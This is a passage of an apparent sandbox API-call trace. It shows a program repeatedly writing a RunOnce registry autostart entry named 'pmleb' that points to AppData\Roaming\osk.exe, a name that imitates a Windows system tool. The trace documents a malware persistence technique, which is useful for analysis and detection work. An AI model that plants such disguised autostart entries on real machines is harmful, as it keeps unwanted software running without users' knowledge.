uIDEvent=0x22b4) returned 1 [0096.882] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.883] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.883] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.883] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.883] RegCloseKey (hKey=0x280) returned 0x0 [0096.883] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.883] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.883] SetTimer (hWnd=0x20280, nIDEvent=0x22b5, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b5 [0096.883] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.897] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.897] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.897] KillTimer (hWnd=0x20280, uIDEvent=0x22b5) returned 1 [0096.898] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.898] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.898] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.898] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.898] RegCloseKey (hKey=0x280) returned 0x0 [0096.898] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.899] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.899] SetTimer (hWnd=0x20280, nIDEvent=0x22b6, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b6 [0096.899] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.913] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.913] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.913] KillTimer (hWnd=0x20280, uIDEvent=0x22b6) returned 1 [0096.913] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.913] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.914] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.914] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.914] RegCloseKey (hKey=0x280) returned 0x0 [0096.914] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.914] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.914] SetTimer (hWnd=0x20280, nIDEvent=0x22b7, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b7 [0096.914] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.929] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.929] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.929] KillTimer (hWnd=0x20280, uIDEvent=0x22b7) returned 1 [0096.930] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0096.930] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.930] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.930] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.931] RegCloseKey (hKey=0x280) returned 0x0 [0096.931] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.931] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.931] SetTimer (hWnd=0x20280, nIDEvent=0x22b8, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b8 [0096.931] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.944] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.944] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.944] KillTimer (hWnd=0x20280, uIDEvent=0x22b8) returned 1 [0096.944] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.945] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.945] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.945] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.945] RegCloseKey (hKey=0x280) returned 0x0 
[0096.946] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.946] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.946] SetTimer (hWnd=0x20280, nIDEvent=0x22b9, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b9 [0096.946] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.959] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.959] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.960] KillTimer (hWnd=0x20280, uIDEvent=0x22b9) returned 1 [0096.960] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.960] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.960] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.961] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.961] RegCloseKey (hKey=0x280) returned 0x0 [0096.961] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.961] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.961] SetTimer (hWnd=0x20280, nIDEvent=0x22ba, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ba [0096.961] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.975] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.975] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.975] KillTimer (hWnd=0x20280, uIDEvent=0x22ba) returned 1 [0096.976] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.976] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.976] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.976] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.977] RegCloseKey (hKey=0x280) returned 0x0 [0096.977] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.977] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.977] SetTimer (hWnd=0x20280, nIDEvent=0x22bb, uElapse=0xa, lpTimerFunc=0x0) returned 0x22bb [0096.977] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.991] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.991] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.991] KillTimer (hWnd=0x20280, uIDEvent=0x22bb) returned 1 [0096.992] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.992] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.992] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.992] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.992] RegCloseKey (hKey=0x280) returned 0x0 [0096.992] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.992] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.993] SetTimer (hWnd=0x20280, nIDEvent=0x22bc, uElapse=0xa, lpTimerFunc=0x0) returned 0x22bc [0096.993] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.006] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.006] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.006] KillTimer (hWnd=0x20280, uIDEvent=0x22bc) returned 1 [0097.007] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.007] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.007] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.007] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.007] RegCloseKey (hKey=0x280) returned 0x0 [0097.008] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.008] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.008] SetTimer (hWnd=0x20280, nIDEvent=0x22bd, uElapse=0xa, lpTimerFunc=0x0) returned 0x22bd [0097.008] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.024] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.024] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.024] KillTimer (hWnd=0x20280, uIDEvent=0x22bd) returned 1 [0097.024] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.025] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.025] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.025] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.025] RegCloseKey (hKey=0x280) returned 0x0 [0097.025] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.025] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.025] SetTimer (hWnd=0x20280, nIDEvent=0x22be, uElapse=0xa, lpTimerFunc=0x0) returned 0x22be [0097.025] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.038] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.038] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.038] KillTimer (hWnd=0x20280, uIDEvent=0x22be) returned 1 [0097.038] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.039] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.039] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.039] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.039] RegCloseKey (hKey=0x280) returned 0x0 [0097.039] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.039] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0097.039] SetTimer (hWnd=0x20280, nIDEvent=0x22bf, uElapse=0xa, lpTimerFunc=0x0) returned 0x22bf [0097.039] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.053] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.053] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.053] KillTimer (hWnd=0x20280, uIDEvent=0x22bf) returned 1 [0097.054] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.054] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.054] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.054] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.054] RegCloseKey (hKey=0x280) returned 0x0 [0097.055] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.055] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.055] SetTimer (hWnd=0x20280, nIDEvent=0x22c0, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c0 [0097.055] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.813] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.813] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.813] KillTimer (hWnd=0x20280, uIDEvent=0x22c0) returned 1 [0097.813] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.814] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.814] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.814] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.814] RegCloseKey (hKey=0x280) returned 0x0 [0097.814] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.814] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.814] SetTimer (hWnd=0x20280, nIDEvent=0x22c1, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c1 [0097.815] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.922] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.922] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.923] KillTimer (hWnd=0x20280, uIDEvent=0x22c1) returned 1 [0097.923] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.923] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.923] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.924] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.924] RegCloseKey (hKey=0x280) returned 0x0 [0097.924] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.924] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.924] SetTimer (hWnd=0x20280, nIDEvent=0x22c2, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c2 
[0097.924] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.927] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.927] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.927] KillTimer (hWnd=0x20280, uIDEvent=0x22c2) returned 1 [0097.928] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.928] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.928] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.928] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.928] RegCloseKey (hKey=0x280) returned 0x0 [0097.928] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.928] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.928] SetTimer (hWnd=0x20280, nIDEvent=0x22c3, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c3 [0097.929] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.943] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.943] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.944] KillTimer (hWnd=0x20280, uIDEvent=0x22c3) returned 1 [0097.944] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.944] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.944] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.944] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.945] RegCloseKey (hKey=0x280) returned 0x0 [0097.945] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.945] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.945] SetTimer (hWnd=0x20280, nIDEvent=0x22c4, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c4 [0097.945] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.958] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.958] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.958] KillTimer (hWnd=0x20280, uIDEvent=0x22c4) returned 1 [0097.958] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.958] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.959] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.959] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.959] RegCloseKey (hKey=0x280) returned 0x0 [0097.959] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.959] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.959] SetTimer (hWnd=0x20280, nIDEvent=0x22c5, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c5 [0097.959] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0097.973] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.973] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.974] KillTimer (hWnd=0x20280, uIDEvent=0x22c5) returned 1 [0097.974] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.974] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.974] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.975] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.975] RegCloseKey (hKey=0x280) returned 0x0 [0097.975] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.975] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.975] SetTimer (hWnd=0x20280, nIDEvent=0x22c6, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c6 [0097.975] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.989] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.989] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.989] KillTimer (hWnd=0x20280, uIDEvent=0x22c6) returned 1 [0097.990] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.990] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.990] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.990] RegSetValueExA (in: 
